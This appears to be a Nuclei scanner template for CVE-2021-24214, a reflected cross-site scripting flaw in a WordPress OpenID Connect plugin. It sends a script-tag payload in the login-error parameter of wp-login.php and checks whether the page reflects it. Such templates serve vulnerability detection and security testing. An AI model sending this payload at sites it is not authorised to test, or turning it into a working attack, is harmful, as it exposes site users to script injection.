38 lines
919 B
YAML
38 lines
919 B
YAML
|
id: CVE-2021-24214
|
||
|
|
||
|
info:
|
||
|
name: 3.8.0-3.8.1 - Reflected Cross Site Scripting (XSS) via Login Error
|
||
|
author: tess
|
||
|
severity: medium
|
||
|
description: |
|
||
|
OpenID Connect Generic Client 3.8.0-3.8.1 - Reflected Cross Site Scripting (XSS) via Login Error
|
||
|
reference:
|
||
|
- https://wpscan.com/vulnerability/31cf0dfb-4025-4898-a5f4-fc7115565a10
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24214
|
||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24214
|
||
|
metadata:
|
||
|
verified: true
|
||
|
tags: xss,wordpress
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/wp-login.php?login-error=<script>alert(0)</script>'
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- '<script>alert(0)</script>'
|
||
|
condition: and
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- text/html
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|